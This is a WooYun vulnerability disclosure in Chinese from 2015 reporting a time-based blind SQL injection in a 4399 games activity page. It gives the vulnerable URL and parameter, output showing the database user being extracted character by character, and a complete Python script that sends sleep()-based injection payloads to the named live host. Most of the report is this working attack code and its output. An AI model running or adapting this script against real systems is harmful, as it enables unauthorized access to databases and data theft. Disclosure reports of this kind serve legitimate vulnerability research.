当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095012

漏洞标题:4399小游戏某站SQL注入(附验证脚本)

相关厂商:4399小游戏

漏洞作者: 吃虾小能手

提交时间:2015-02-01 14:03

修复时间:2015-02-06 14:04

公开时间:2015-02-06 14:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-01: 细节已通知厂商并且等待厂商处理中
2015-02-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://huodong2.4399.com/comm/invitewap/share.php?cu=568443&u=945928751&from=singlemessage&token=04dd20&id=406&ext=&isappinstalled=1

漏洞证明:

start to retrive MySQL user:
[in progress] 9
[in progress] 9h
[in progress] 9hu
[in progress] 9huo
[in progress] 9huoc
[in progress] 9huoco
[in progress] 9huocon
[in progress] 9huocong
[in progress] 9huocongh
[in progress] 9huocongh@
[in progress] 9huocongh@v
[in progress] 9huocongh@vq
[in progress] 9huocongh@vqy
[in progress] 9huocongh@vqy.
[in progress] 9huocongh@vqy.q
[in progress] 9huocongh@vqy.q6
[in progress] 9huocongh@vqy.q68
[in progress] 9huocongh@vqy.q68.
[in progress] 9huocongh@vqy.q68.a
[in progress] 9huocongh@vqy.q68.a0
[in progress] 9huocongh@vqy.q68.a00
[in progress] 9huocongh@vqy.q68.a00.
[in progress] 9huocongh@vqy.q68.a00.s
[in progress] 9huocongh@vqy.q68.a00.s9
[in progress] 9huocongh@vqy.q68.a00.s9m
[in progress] 9huocongh@vqy.q68.a00.s9mu
[in progress] 9huocongh@vqy.q68.a00.s9muj
[in progress] 9huocongh@vqy.q68.a00.s9mujk
[in progress] 9huocongh@vqy.q68.a00.s9mujkl
MySQL user is 9huocongh@vqy.q68.a00.s9mujkl
脚本是李姐姐的:

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
headers = {
'Cookie': '',
'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list(string.ascii_lowercase)
for i in range(0, 10):
payloads.append(str(i))
payloads += ['@','_', '.']
print 'start to retrive MySQL user:'
user = ''
for i in range(0, 40):
for payload in payloads:
conn = httplib.HTTPConnection('huodong2.4399.com', timeout=60)
s = '945928751 and ' \
'sleep(1-abs(sign(ascii(mid(lower(user())from(%s)for(1)))-%s))) ' \
% (i, ord(payload))
conn.request(method='GET',
url='/comm/invitewap/share.php?cu=568443&from=singlemessage&token=04dd20&id=406&ext=&isappinstalled=1&u='+urllib.quote(s),
headers=headers)
start_time = time.time()
conn.getresponse().read()
if time.time() - start_time > 1.0:
user += payload
print '[in progress]', user
break
else:
#print '.'
pass
print '\nMySQL user is', user

修复方案:

版权声明:转载请注明来源 吃虾小能手@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-02-06 14:04

厂商回复:

最新状态:

暂无